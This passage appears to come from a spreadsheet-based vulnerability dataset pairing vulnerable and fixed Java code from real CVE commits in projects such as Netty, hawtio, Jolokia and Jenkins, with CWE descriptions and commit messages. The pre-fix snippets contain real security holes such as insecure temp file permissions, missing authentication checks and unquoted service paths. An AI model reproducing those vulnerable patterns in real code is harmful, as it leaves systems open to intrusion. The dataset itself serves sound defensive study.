            tmpFile = PlatformDependent.createTempFile(getPrefix(), newpostfix, null);
            tmpFile = PlatformDependent.createTempFile(getPrefix(), newpostfix, new File(
</t>
  </si>
  <si>
    <t>Use Files.createTempFile(...) to ensure the file is created with prop……er permissions
Motivation:
File.createTempFile(String, String)` will create a temporary file in the system temporary directory if the 'java.io.tmpdir'. The permissions on that file utilize the umask. In a majority of cases, this means that the file that java creates has the permissions: `-rw-r--r--`, thus, any other local user on that system can read the contents of that file.
This can be a security concern if any sensitive data is stored in this file.
This was reported by Jonathan Leitschuh &lt;jonathan.leitschuh@gmail.com&gt; as a security problem.
Modifications:
Use Files.createTempFile(...) which will use safe-defaults when running on java 7 and later. If running on java 6 there isnt much we can do, which is fair enough as java 6 shouldnt be considered "safe" anyway.
Result:
Create temporary files with sane permissions by default.</t>
  </si>
  <si>
    <t>Creation of Temporary File in Directory with Insecure Permissions</t>
  </si>
  <si>
    <t>The software creates a temporary file in a directory whose permissions allow unintended actors to determine the file's existence or otherwise access that file.</t>
  </si>
  <si>
    <t>On some operating systems, the fact that the temporary file exists may be apparent to any user with sufficient privileges to access that directory. Since the file is visible, the application that is using the temporary file could be known. If one has access to list the processes on the system, the attacker has gained information about what the user is doing at that time. By correlating this with the applications the user is running, an attacker could potentially discover what a user's actions are. From this, higher levels of security could be breached.</t>
  </si>
  <si>
    <t>NativeLibraryLoader.java</t>
  </si>
  <si>
    <t xml:space="preserve">            tmpFile = File.createTempFile(prefix, suffix, WORKDIR);
</t>
  </si>
  <si>
    <t xml:space="preserve">            tmpFile = PlatformDependent.createTempFile(prefix, suffix, WORKDIR);
</t>
  </si>
  <si>
    <t>PlatformDependent.java</t>
  </si>
  <si>
    <t xml:space="preserve">import java.nio.file.Files;
    @SuppressJava6Requirement(reason = "Guarded by version check")
    public static File createTempFile(String prefix, String suffix, File directory) throws IOException {
        if (javaVersion() &gt;= 7) {
            if (directory == null) {
                return Files.createTempFile(prefix, suffix).toFile();
            }
            return Files.createTempFile(directory.toPath(), prefix, suffix).toFile();
        }
        if (directory == null) {
            return File.createTempFile(prefix, suffix);
        }
        File file = File.createTempFile(prefix, suffix, directory);
        // Try to adjust the perms, if this fails there is not much else we can do...
        file.setReadable(false, false);
        file.setReadable(true, true);
        return file;
    }
</t>
  </si>
  <si>
    <t>SelfSignedCertificate.java</t>
  </si>
  <si>
    <t xml:space="preserve">        File keyFile = File.createTempFile("keyutil_" + fqdn + '_', ".key");
        File certFile = File.createTempFile("keyutil_" + fqdn + '_', ".crt");
</t>
  </si>
  <si>
    <t xml:space="preserve">import io.netty.util.internal.PlatformDependent;
import java.nio.file.Files;
        File keyFile = PlatformDependent.createTempFile("keyutil_" + fqdn + '_', ".key", null);
        File certFile = PlatformDependent.createTempFile("keyutil_" + fqdn + '_', ".crt", null);
</t>
  </si>
  <si>
    <t>CWE-428</t>
  </si>
  <si>
    <t>CVE-2021-21292</t>
  </si>
  <si>
    <t>https://github.com/traccar/traccar/commit/cc69a9907ac9878db3750aa14ffedb28626455da</t>
  </si>
  <si>
    <t>WindowsService.java</t>
  </si>
  <si>
    <t>cc69a9907ac9878db3750aa14ffedb28626455da</t>
  </si>
  <si>
    <t xml:space="preserve"> * Copyright 2018 Anton Tananaev (anton@traccar.org)
        String javaBinary = javaHome + "\\bin\\java.exe";
</t>
  </si>
  <si>
    <t xml:space="preserve"> * Copyright 2018 - 2020 Anton Tananaev (anton@traccar.org)
        String javaBinary = "\"" + javaHome + "\\bin\\java.exe\"";
</t>
  </si>
  <si>
    <t>Quote binary path</t>
  </si>
  <si>
    <t>Unquoted Search Path or Element</t>
  </si>
  <si>
    <t>The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path.</t>
  </si>
  <si>
    <t>If a malicious individual has access to the file system, it is possible to elevate privileges by inserting such a file as C:Program.exe to be run by a privileged program making use of WinExec.</t>
  </si>
  <si>
    <t>CWE-863</t>
  </si>
  <si>
    <t>CVE-2021-21318</t>
  </si>
  <si>
    <t>https://github.com/opencast/opencast/commit/b18c6a7f81f08ed14884592a6c14c9ab611ad450</t>
  </si>
  <si>
    <t>SearchServiceImpl.java</t>
  </si>
  <si>
    <t>b18c6a7f81f08ed14884592a6c14c9ab611ad450</t>
  </si>
  <si>
    <t xml:space="preserve">   * @throws MediaPackageException
   *           if the mediapckage is invalid
  public void addSynchronously(MediaPackage mediaPackage) throws SearchException, MediaPackageException,
          IllegalArgumentException, UnauthorizedException {
    logger.debug("Attempting to add mediapackage {} to search index", mediaPackage.getIdentifier());
      if (indexManager.add(mediaPackage, acl, now)) {
        logger.info("Added mediapackage `{}` to the search index, using ACL `{}`", mediaPackage, acl);
        logger.warn("Failed to add mediapackage {} to the search index", mediaPackage.getIdentifier());
      logger.error("Could not store media package to search database {}: {}", mediaPackage.getIdentifier(), e);
      throw new SearchException(e);
   * @throws UnauthorizedException
   *           if the user did not have access to the media package
   * @throws NotFoundException
   *           if the mediapackage did not exist
  public boolean deleteSynchronously(String mediaPackageId) throws SearchException, UnauthorizedException,
          NotFoundException {
      logger.info("Removing mediapackage {} from search index", mediaPackageId);
      return indexManager.delete(mediaPackageId, now);
    } catch (SolrServerException e) {
</t>
  </si>
  <si>
    <t xml:space="preserve">  public void addSynchronously(MediaPackage mediaPackage)
      throws SearchException, IllegalArgumentException, UnauthorizedException, NotFoundException,
      SearchServiceDatabaseException {
    final String mediaPackageId = mediaPackage.getIdentifier().toString();
    logger.debug("Attempting to add media package {} to search index", mediaPackageId);
    AccessControlList seriesAcl = persistence.getAccessControlLists(mediaPackage.getSeries(), mediaPackageId).stream()
        .reduce(new AccessControlList(acl.getEntries()), AccessControlList::mergeActions);
    logger.debug("Updating series with merged access control list: {}", seriesAcl);
      if (indexManager.add(mediaPackage, acl, seriesAcl, now)) {
        logger.info("Added media package `{}` to the search index, using ACL `{}`", mediaPackageId, acl);
        logger.warn("Failed to add media package {} to the search index", mediaPackageId);
      throw new SearchException(
          String.format("Could not store media package to search database %s", mediaPackageId), e);
  public boolean deleteSynchronously(final String mediaPackageId) throws SearchException {
      final String seriesId = result.getItems()[0].getDcIsPartOf();
      logger.info("Removing media package {} from search index", mediaPackageId);
      final boolean success = indexManager.delete(mediaPackageId, now);
      // Update series
      if (seriesId != null) {
        if (persistence.getMediaPackages(seriesId).size() &gt; 0) {
          // Update series acl if there are still episodes in the series
          final AccessControlList seriesAcl = persistence.getAccessControlLists(seriesId).stream()
              .reduce(new AccessControlList(), AccessControlList::mergeActions);
          indexManager.addSeries(seriesId, seriesAcl);
        } else {
          // Remove series if there are no episodes in the series any longer
          indexManager.delete(seriesId, now);
        }
      }
      return success;
    } catch (SolrServerException | SearchServiceDatabaseException e) {
</t>
  </si>
  <si>
    <t>Fix Engage Series Publication and AccessAccess to series and series metadata on the search service (shown in
media module and player) depends on the events published which are part
of the series. Publishing an event will automatically publish a series
and update access to it. Removing an event or republishing the event
should do the same.
Incorrectly Hiding Public Series
--------------------------------
This patch fixes the access control update to the series when a new
episode is being published. Until now, a new episode publication would
always update the series access with the episode access.
While this is no security issue since it can only cause the access to be
stricter, it may cause public series to become private. This would
happen, for example, if a users sets one episode of a series to private
and republishes the episode.
Now, the search service will merge the access control lists of all
episodes to grant access based on their combined access rules.
Update Series on Removal
------------------------
This patch fixes Opencast not updating the series access or remove a
published series if an event is being removed.
This means that access to a series is re-calculated when an episode is
being deleted based on the remaining published episodes in the series.
For example, removing the last episode with public access will now make
the series private which it would have stayed public before.
It also means that if the last episode of a series is being removed, the
series itself will be unpublished as well, so no empty series will
continue to show up any longer.</t>
  </si>
  <si>
    <t>Incorrect Authorization</t>
  </si>
  <si>
    <t>The software performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check. This allows attackers to bypass intended access restrictions.</t>
  </si>
  <si>
    <t>Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource. When access control checks are incorrectly applied, users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution.</t>
  </si>
  <si>
    <t>SearchEntity.java</t>
  </si>
  <si>
    <t xml:space="preserve">    @NamedQuery(name = "Search.findBySeriesId", query = "SELECT s FROM SearchEntity s WHERE s.seriesId=:seriesId"),
</t>
  </si>
  <si>
    <t xml:space="preserve">    @NamedQuery(name = "Search.findBySeriesId", query = "SELECT s FROM SearchEntity s WHERE s.seriesId=:seriesId and "
        + "s.deletionDate is null"),
</t>
  </si>
  <si>
    <t>SearchServiceDatabase.java</t>
  </si>
  <si>
    <t xml:space="preserve">   * Retrieves ACL for series with given ID.
          SearchServiceDatabaseException;
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.Collection;
   * Gets media packages from a specific series
   *
   * @param seriesId
   *          the series identifier
   * @return collection of media packages
   * @throws SearchServiceDatabaseException
   *           if there is a problem communicating with the underlying data store
   */
  Collection&lt;MediaPackage&gt; getMediaPackages(String seriesId) throws SearchServiceDatabaseException;
  /**
   * Retrieves ACL for episode with given ID.
      SearchServiceDatabaseException;
  /**
   * Retrieves ACLs for series with given ID.
   *
   * @param seriesId
   *          series identifier for which ACL will be retrieved
   * @param excludeIds
   *          list of media package identifier to exclude from the list
   * @return Collection of {@link AccessControlList} of media packages from the series
   * @throws SearchServiceDatabaseException
   *           if exception occurred
   */
  Collection&lt;AccessControlList&gt; getAccessControlLists(String seriesId, String ... excludeIds)
      throws SearchServiceDatabaseException;
</t>
  </si>
  <si>
    <t>SearchServiceDatabaseImpl.java</t>
  </si>
  <si>
    <t xml:space="preserve">      logger.error("Could not retrieve ACL {}: {}", mediaPackageId, e.getMessage());
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.opencastproject.mediapackage.MediaPackageException;
import org.opencastproject.security.api.AccessControlParsingException;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
      logger.error("Could not retrieve ACL {}", mediaPackageId, e);
  /**
   * {@inheritDoc}
   *
   * @see org.opencastproject.search.impl.persistence.SearchServiceDatabase#getAccessControlLists(String, String...)
   */
  @Override
  public Collection&lt;AccessControlList&gt; getAccessControlLists(final String seriesId, String ... excludeIds)
      throws SearchServiceDatabaseException {
    List&lt;String&gt; excludes = Arrays.asList(excludeIds);
    List&lt;AccessControlList&gt; accessControlLists = new ArrayList&lt;&gt;();
    EntityManager em = emf.createEntityManager();
    TypedQuery&lt;SearchEntity&gt; q = em.createNamedQuery("Search.findBySeriesId", SearchEntity.class)
        .setParameter("seriesId", seriesId);
    try {
      for (SearchEntity entity: q.getResultList()) {
        if (entity.getAccessControl() != null &amp;&amp; !excludes.contains(entity.getMediaPackageId())) {
          accessControlLists.add(AccessControlParser.parseAcl(entity.getAccessControl()));
        }
      }
    } catch (IOException | AccessControlParsingException e) {
      throw new SearchServiceDatabaseException(e);
    } finally {
      em.close();
    }
    return accessControlLists;
  }
  /**
   * {@inheritDoc}
   *
   * @see org.opencastproject.search.impl.persistence.SearchServiceDatabase#getMediaPackages(String)
   */
  @Override
  public Collection&lt;MediaPackage&gt; getMediaPackages(final String seriesId)
      throws SearchServiceDatabaseException {
    List&lt;MediaPackage&gt; episodes = new ArrayList&lt;&gt;();
    EntityManager em = emf.createEntityManager();
    TypedQuery&lt;SearchEntity&gt; q = em.createNamedQuery("Search.findBySeriesId", SearchEntity.class)
        .setParameter("seriesId", seriesId);
    try {
      for (SearchEntity entity: q.getResultList()) {
        if (entity.getMediaPackageXML() != null) {
          episodes.add(MediaPackageParser.getFromXml(entity.getMediaPackageXML()));
        }
      }
    } catch (MediaPackageException e) {
      throw new SearchServiceDatabaseException(e);
    } finally {
      em.close();
    }
    return episodes;
  }
</t>
  </si>
  <si>
    <t>SolrIndexManager.java</t>
  </si>
  <si>
    <t xml:space="preserve">  public boolean add(MediaPackage sourceMediaPackage, AccessControlList acl, Date now) throws SolrServerException,
          UnauthorizedException {
      SolrInputDocument seriesDocument = createSeriesInputDocument(sourceMediaPackage.getSeries(), acl);
      // If neither an episode nor a series was contained, there is no point in trying to update
      if (episodeDocument == null &amp;&amp; seriesDocument == null) {
        logger.warn("Neither episode nor series metadata found");
        return false;
      }
      if (episodeDocument != null)
        solrServer.add(episodeDocument);
      logger.error("Unable to add mediapackage {} to index", sourceMediaPackage.getIdentifier());
      throw new SolrServerException(e);
</t>
  </si>
  <si>
    <t xml:space="preserve">  public boolean add(MediaPackage sourceMediaPackage, AccessControlList acl, AccessControlList seriesAcl, Date now)
      throws SolrServerException, UnauthorizedException {
      SolrInputDocument seriesDocument = createSeriesInputDocument(sourceMediaPackage.getSeries(), seriesAcl);
      solrServer.add(episodeDocument);
      throw new SolrServerException(
          String.format("Unable to add media package %s to index", sourceMediaPackage.getIdentifier()), e);
    }
  }
  /**
   * Posts a series to Solr. If the entry already exists, this will update the series.
   *
   * @param seriesId
   *          the series to post
   * @param acl
   *          the access control list for this series
   * @throws SolrServerException
   *           if an errors occurs while talking to solr
   */
  public void addSeries(final String seriesId, final AccessControlList acl) throws SolrServerException {
    try {
      SolrInputDocument seriesDocument = createSeriesInputDocument(seriesId, acl);
      if (seriesDocument != null) {
        solrServer.add(seriesDocument);
        solrServer.commit();
      }
    } catch (Exception e) {
      throw new SolrServerException(String.format("Unable to add series %s to index", seriesId), e);
</t>
  </si>
  <si>
    <t>CWE-915</t>
  </si>
  <si>
    <t>CVE-2021-27582</t>
  </si>
  <si>
    <t>https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/commit/7eba3c12fed82388f917e8dd9b73e86e3a311e4c</t>
  </si>
  <si>
    <t>OAuthConfirmationController.java</t>
  </si>
  <si>
    <t>7eba3c12fed82388f917e8dd9b73e86e3a311e4c</t>
  </si>
  <si>
    <t xml:space="preserve">	public String confimAccess(Map&lt;String, Object&gt; model, @ModelAttribute("authorizationRequest") AuthorizationRequest authRequest,
			Principal p) {
</t>
  </si>
  <si>
    <t xml:space="preserve">	public String confirmAccess(Map&lt;String, Object&gt; model, Principal p) {
		AuthorizationRequest authRequest = (AuthorizationRequest) model.get("authorizationRequest");
</t>
  </si>
  <si>
    <t>Fix Spring Autobinding vulnerability1. Make authorizationRequest no longer affected by http request parameters due to @ModelAttribute. See http://agrrrdog.blogspot.com/2017/03/autobinding-vulns-and-spring-mvc.html</t>
  </si>
  <si>
    <t>Improperly Controlled Modification of Dynamically-Determined Object Attributes</t>
  </si>
  <si>
    <t>The software receives input from an upstream component that specifies multiple attributes, properties, or fields that are to be initialized or updated in an object, but it does not properly control which attributes can be modified.</t>
  </si>
  <si>
    <t>If the object contains attributes that were only intended for internal use, then their unexpected modification could lead to a vulnerability. This weakness is sometimes known by the language-specific mechanisms that make it possible, such as mass assignment, autobinding, or object injection.</t>
  </si>
  <si>
    <t>CVE-2014-0086</t>
  </si>
  <si>
    <t>https://github.com/pslegr/core-1/commit/8131f15003f5bec73d475d2b724472e4b87d0757</t>
  </si>
  <si>
    <t>PushHandlerFilter.java</t>
  </si>
  <si>
    <t>8131f15003f5bec73d475d2b724472e4b87d0757</t>
  </si>
  <si>
    <t xml:space="preserve">                Meteor meteor = Meteor.build(httpReq, SCOPE.REQUEST, Collections.&lt;BroadcastFilter&gt;emptyList(), null);
</t>
  </si>
  <si>
    <t>RF-13250: applying patch</t>
  </si>
  <si>
    <t>CVE-2014-0120</t>
  </si>
  <si>
    <t>https://github.com/hawtio/hawtio/commit/b4e23e002639c274a2f687ada980118512f06113</t>
  </si>
  <si>
    <t>TerminalServlet.java</t>
  </si>
  <si>
    <t>b4e23e002639c274a2f687ada980118512f06113</t>
  </si>
  <si>
    <t xml:space="preserve">import javax.security.auth.Subject;
import java.security.AccessControlContext;
import java.security.AccessController;
        if (session == null) {
          AccessControlContext acc = AccessController.getContext();
          Subject subject = Subject.getSubject(acc);
          if (subject == null) {
          }
          session = request.getSession(true);
          session.setAttribute("subject", subject);
        } else {
          Subject subject = (Subject) session.getAttribute("subject");
          if (subject == null) {
            session.invalidate();
          }
</t>
  </si>
  <si>
    <t xml:space="preserve">import io.hawt.web.LoginTokenServlet;
        String token = request.getHeader(LoginTokenServlet.LOGIN_TOKEN);
        if (token == null || session == null) {
        }
        String sessionToken = (String) session.getAttribute(LoginTokenServlet.LOGIN_TOKEN);
        if (!token.equals(sessionToken)) {
</t>
  </si>
  <si>
    <t>Add a LoginTokenServlet that plugins can use to fetch a token, and le……t's use it in hawtio-karaf-terminal. Also handle cases where the terminal scope gets created a couple times.</t>
  </si>
  <si>
    <t>LoginServlet.java</t>
  </si>
  <si>
    <t xml:space="preserve">import java.io.IOException;
import java.io.PrintWriter;
import java.security.AccessControlContext;
import java.security.AccessController;
import java.security.Principal;
import java.util.ArrayList;
import java.util.GregorianCalendar;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Set;
import io.hawt.system.ConfigManager;
import io.hawt.system.Helpers;
import org.jolokia.converter.Converters;
import org.jolokia.converter.json.JsonConvertOptions;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
    Converters converters = new Converters();
    JsonConvertOptions options = JsonConvertOptions.DEFAULT;
    ConfigManager config;
            returnPrincipals(subject, out);
        returnPrincipals(subject, out);
    private void returnPrincipals(Subject subject, PrintWriter out) {
</t>
  </si>
  <si>
    <t xml:space="preserve">import io.hawt.system.ConfigManager;
import io.hawt.system.Helpers;
import org.jolokia.converter.Converters;
import org.jolokia.converter.json.JsonConvertOptions;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.IOException;
import java.io.PrintWriter;
import java.security.AccessControlContext;
import java.security.AccessController;
import java.security.Principal;
import java.util.*;
    protected Converters converters = new Converters();
    protected JsonConvertOptions options = JsonConvertOptions.DEFAULT;
    protected ConfigManager config;
                return;
            sendResponse(session, subject, out);
        sendResponse(session, subject, out);
    protected void sendResponse(HttpSession session, Subject subject, PrintWriter out) {
</t>
  </si>
  <si>
    <t>LoginTokenServlet.java</t>
  </si>
  <si>
    <t xml:space="preserve">package io.hawt.web;
import org.apache.commons.codec.binary.Base64;
import javax.security.auth.Subject;
import javax.servlet.http.HttpSession;
import java.io.PrintWriter;
import java.security.SecureRandom;
import java.util.HashMap;
import java.util.Map;
/**
 * @author Stan Lewis
 */
public class LoginTokenServlet extends LoginServlet {
    private static final long serialVersionUID = 1L;
    public static final String LOGIN_TOKEN = "LoginToken";
    @Override
    protected void sendResponse(HttpSession session, Subject subject, PrintWriter out) {
        String token = (String) session.getAttribute(LOGIN_TOKEN);
        if ( token == null) {
            byte[] seed = (subject.toString() + new Long(System.currentTimeMillis()).toString()).getBytes();
            SecureRandom random = new SecureRandom(seed);
            byte[] tokenBytes = new byte[128];
            random.nextBytes(tokenBytes);
            token = Base64.encodeBase64String(tokenBytes);
            session.setAttribute(LOGIN_TOKEN, token);
        }
        Map&lt;String, String&gt; answer = new HashMap&lt;String, String&gt;();
        answer.put("token", token);
        ServletHelpers.writeObject(converters, options, out, answer);
    }
}
</t>
  </si>
  <si>
    <t>CWE-287</t>
  </si>
  <si>
    <t>CVE-2014-0121</t>
  </si>
  <si>
    <t>https://github.com/hawtio/hawtio/commit/5289715e4f2657562fdddcbad830a30969b96e1e</t>
  </si>
  <si>
    <t>KarafTerminalContextListener.java</t>
  </si>
  <si>
    <t>5289715e4f2657562fdddcbad830a30969b96e1e</t>
  </si>
  <si>
    <t xml:space="preserve">package io.hawt.web.plugin.karaf.terminal;
import io.hawt.system.ConfigManager;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
/**
 * @author Stan Lewis
 */
public class KarafTerminalContextListener implements ServletContextListener {
  private ConfigManager configManager = new ConfigManager();
  @Override
  public void contextInitialized(ServletContextEvent sce) {
    try {
      configManager.init();
    } catch (Exception e) {
      throw createServletException(e);
    }
    sce.getServletContext().setAttribute("ConfigManager", configManager);
  }
  @Override
  public void contextDestroyed(ServletContextEvent sce) {
    try {
      configManager.destroy();
    } catch (Exception e) {
      throw createServletException(e);
    }
  }
  protected RuntimeException createServletException(Exception e) {
    return new RuntimeException(e);
  }
}
</t>
  </si>
  <si>
    <t>Ensure we secure hawtio-karaf-terminal's /term context</t>
  </si>
  <si>
    <t>Improper Authentication</t>
  </si>
  <si>
    <t>When an actor claims to have a given identity, the software does not prove or insufficiently proves that the claim is correct.</t>
  </si>
  <si>
    <t xml:space="preserve">        SessionTerminal st = (SessionTerminal) request.getSession(true).getAttribute("terminal");
            request.getSession().setAttribute("terminal", st);
</t>
  </si>
  <si>
    <t xml:space="preserve">import io.hawt.system.Helpers;
import javax.security.auth.Subject;
import javax.servlet.http.HttpSession;
import java.security.AccessControlContext;
import java.security.AccessController;
        HttpSession session = request.getSession(false);
        if (session == null) {
          AccessControlContext acc = AccessController.getContext();
          Subject subject = Subject.getSubject(acc);
          if (subject == null) {
            Helpers.doForbidden(response);
            return;
          }
          session = request.getSession(true);
          session.setAttribute("subject", subject);
        } else {
          Subject subject = (Subject) session.getAttribute("subject");
          if (subject == null) {
            session.invalidate();
            Helpers.doForbidden(response);
            return;
          }
        }
        SessionTerminal st = (SessionTerminal) session.getAttribute("terminal");
            session.setAttribute("terminal", st);
</t>
  </si>
  <si>
    <t>AuthenticationFilter.java</t>
  </si>
  <si>
    <t xml:space="preserve">        boolean doAuthenticate = path.startsWith("/auth") ||
                path.startsWith("/jolokia") ||
                path.startsWith("/upload");
            LOG.debug("No authentication needed for path {}", path);
</t>
  </si>
  <si>
    <t xml:space="preserve">        boolean doAuthenticate = true;
            LOG.warn("No authentication needed for path {}", path);
</t>
  </si>
  <si>
    <t>CVE-2014-0168</t>
  </si>
  <si>
    <t>https://github.com/rhuss/jolokia/commit/2d9b168cfbbf5a6d16fa6e8a5b34503e3dc42364</t>
  </si>
  <si>
    <t>BackendManager.java</t>
  </si>
  <si>
    <t>2d9b168cfbbf5a6d16fa6e8a5b34503e3dc42364</t>
  </si>
  <si>
    <t xml:space="preserve">     * @return true if icors access is allowed
    public boolean isCorsAccessAllowed(String pOrigin) {
        return restrictor.isCorsAccessAllowed(pOrigin);
</t>
  </si>
  <si>
    <t xml:space="preserve">     * @param pStrictChecking whether to a strict check (i.e. server side check)
     * @return true if if cors access is allowed
    public boolean isOriginAllowed(String pOrigin,boolean pStrictChecking) {
        return restrictor.isOriginAllowed(pOrigin, pStrictChecking);
</t>
  </si>
  <si>
    <t>Enchanced policy wr to origin handling. The Origin: can now be checke……d on the server side, too.</t>
  </si>
  <si>
    <t xml:space="preserve">            requestHandler.checkClientIPAccess(pReq.getRemoteHost(),pReq.getRemoteAddr());
</t>
  </si>
  <si>
    <t xml:space="preserve">            requestHandler.checkAccess(pReq.getRemoteHost(), pReq.getRemoteAddr(),
                                       getOriginOrReferer(pReq));
    private String getOriginOrReferer(HttpServletRequest pReq) {
        String origin = pReq.getHeader("Origin");
        if (origin == null) {
            origin = pReq.getHeader("Referer");
        }
        return origin != null ? origin.replaceAll("[\\n\\r]*","") : null;
    }
</t>
  </si>
  <si>
    <t>HttpRequestHandler.java</t>
  </si>
  <si>
    <t xml:space="preserve">        if (pOrigin != null &amp;&amp; backendManager.isCorsAccessAllowed(pOrigin)) {
    public void checkClientIPAccess(String pHost, String pAddress) {
     * Check whether for the given host is a cross-browser request allowed. This check is deligated to the
            if (backendManager.isCorsAccessAllowed(origin)) {
</t>
  </si>
  <si>
    <t xml:space="preserve">        if (pOrigin != null &amp;&amp; backendManager.isOriginAllowed(pOrigin,false)) {
     * @param pOrigin (optional) origin header to check also.
    public void checkAccess(String pHost, String pAddress, String pOrigin) {
        if (pOrigin != null &amp;&amp; !backendManager.isOriginAllowed(pOrigin,true)) {
            throw new SecurityException("Origin " + pOrigin + " is not allowed to call this agent");
        }
     * Check whether for the given host is a cross-browser request allowed. This check is delegated to the
            if (backendManager.isOriginAllowed(origin,false)) {
</t>
  </si>
  <si>
    <t>AbstractConstantRestrictor.java</t>
  </si>
  <si>
    <t xml:space="preserve">    public boolean isCorsAccessAllowed(String pOrigin) {
</t>
  </si>
  <si>
    <t xml:space="preserve">    public boolean isOriginAllowed(String pOrigin, boolean pIsStrictCheck) {
</t>
  </si>
  <si>
    <t>PolicyRestrictor.java</t>
  </si>
  <si>
    <t xml:space="preserve">    public boolean isCorsAccessAllowed(String pOrigin) {
        return corsChecker.check(pOrigin);
</t>
  </si>
  <si>
    <t xml:space="preserve">    public boolean isOriginAllowed(String pOrigin, boolean pIsStrictCheck) {
        return corsChecker.check(pOrigin,pIsStrictCheck);
</t>
  </si>
  <si>
    <t>Restrictor.java</t>
  </si>
  <si>
    <t xml:space="preserve">     * @param pOrigin the "Origin:" URL provided within the request
    boolean isCorsAccessAllowed(String pOrigin);
</t>
  </si>
  <si>
    <t xml:space="preserve">     * @param pOrigin the "Origin:" header provided within the request
     * @param pIsStrictCheck whether doing a strict check
    boolean isOriginAllowed(String pOrigin, boolean pIsStrictCheck);
</t>
  </si>
  <si>
    <t>CorsChecker.java</t>
  </si>
  <si>
    <t xml:space="preserve">                    assertNodeName(node,"allow-origin");
                    String p = node.getTextContent().trim().toLowerCase();
                    p = Pattern.quote(p).replace("*","\\E.*\\Q");
                    patterns.add(Pattern.compile("^" + p + "$"));
            if (pattern.matcher(pArg).matches()) {
</t>
  </si>
  <si>
    <t xml:space="preserve">    private boolean strictChecking = false;
     *
     *       &amp;lt;strict-checking/&amp;gt;
                    assertNodeName(node,"allow-origin","strict-checking");
                    if (node.getNodeName().equals("allow-origin")) {
                        String p = node.getTextContent().trim().toLowerCase();
                        p = Pattern.quote(p).replace("*", "\\E.*\\Q");
                        patterns.add(Pattern.compile("^" + p + "$"));
                    } else if (node.getNodeName().equals("strict-checking")) {
                        strictChecking = true;
                    }
        return check(pArg,false);
    }
    public boolean check(String pOrigin, boolean pIsStrictCheck) {
        // Method called during strict checking but we have not configured that
        // So the check passes always.
        if (pIsStrictCheck &amp;&amp; !strictChecking) {
            return true;
        }
            if (pattern.matcher(pOrigin).matches()) {
</t>
  </si>
  <si>
    <t>CVE-2014-1904</t>
  </si>
  <si>
    <t>https://github.com/spring-projects/spring-framework/commit/741b4b229ae032bd17175b46f98673ce0bd2d485</t>
  </si>
  <si>
    <t>FormTag.java</t>
  </si>
  <si>
    <t>741b4b229ae032bd17175b46f98673ce0bd2d485</t>
  </si>
  <si>
    <t xml:space="preserve"> * Copyright 2002-2013 the original author or authors.
</t>
  </si>
  <si>
    <t xml:space="preserve"> * Copyright 2002-2014 the original author or authors.
import java.io.UnsupportedEncodingException;
import org.springframework.web.util.UriUtils;
			String encoding = pageContext.getResponse().getCharacterEncoding();
			try {
				requestUri = UriUtils.encodePath(requestUri, encoding);
			}
			catch (UnsupportedEncodingException e) {
				throw new JspException(e);
			}
</t>
  </si>
  <si>
    <t>Add encoding for the default action in FormTagIssue: SPR-11426</t>
  </si>
  <si>
    <t>CVE-2014-2059</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/ad38d8480f20ce3cbf8fec3e2003bc83efda4f7d</t>
  </si>
  <si>
    <t>CreateJobCommand.java</t>
  </si>
  <si>
    <t>ad38d8480f20ce3cbf8fec3e2003bc83efda4f7d</t>
  </si>
  <si>
    <t xml:space="preserve">        Jenkins.checkGoodName(name);
</t>
  </si>
  <si>
    <t>[FIXED SECURITY-108] Check job name created via CLI</t>
  </si>
  <si>
    <t>CVE-2014-2062</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/5548b5220cfd496831b5721124189ff18fbb12a3</t>
  </si>
  <si>
    <t>ApiTokenFilter.java</t>
  </si>
  <si>
    <t>5548b5220cfd496831b5721124189ff18fbb12a3</t>
  </si>
  <si>
    <t xml:space="preserve">import hudson.security.UserMayOrMayNotExistException;
import jenkins.model.Jenkins;
import org.acegisecurity.userdetails.UsernameNotFoundException;
import org.springframework.dao.DataAccessException;
                try {
                    Jenkins.getInstance().getSecurityRealm().loadUserByUsername(username);
                } catch (UserMayOrMayNotExistException x) {
                    // OK, give them the benefit of the doubt.
                } catch (UsernameNotFoundException x) {
                    // Not/no longer a user; deny the API token. (But do not leak the information that this happened.)
                    chain.doFilter(request, response);
                    return;
                } catch (DataAccessException x) {
                    throw new ServletException(x);
                }
</t>
  </si>
  <si>
    <t>[FIXED SECURITY-89] When checking an API token, verify that the user ……actually exists.</t>
  </si>
  <si>
    <t>CVE-2014-2064</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/fbf96734470caba9364f04e0b77b0bae7293a1ec</t>
  </si>
  <si>
    <t>HudsonPrivateSecurityRealm.java</t>
  </si>
  <si>
    <t>fbf96734470caba9364f04e0b77b0bae7293a1ec</t>
  </si>
  <si>
    <t xml:space="preserve">        if (!u.isPasswordCorrect(password))
            throw new BadCredentialsException("Failed to login as "+username);
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.MissingResourceException;
import java.util.ResourceBundle;
        if (!u.isPasswordCorrect(password)) {
            String message;
            try {
                message = ResourceBundle.getBundle("org.acegisecurity.messages").getString("AbstractUserDetailsAuthenticationProvider.badCredentials");
            } catch (MissingResourceException x) {
                message = "Bad credentials";
            }
            throw new BadCredentialsException(message);
        }
</t>
  </si>
  <si>
    <t>[FIXED SECURITY-79] Prevent (private security realm) usernames from b……eing guessed.</t>
  </si>
  <si>
    <t>CVE-2014-2065</t>
  </si>
  <si>
    <t>https://github.com/jenkinsci/jenkins/commit/a0b00508eeb74d7033dc4100eb382df4e8fa72e7</t>
  </si>
  <si>
    <t>Functions.java</t>
  </si>
  <si>
    <t>a0b00508eeb74d7033dc4100eb382df4e8fa72e7</t>
  </si>
  <si>
    <t xml:space="preserve">import org.kohsuke.accmod.Restricted;
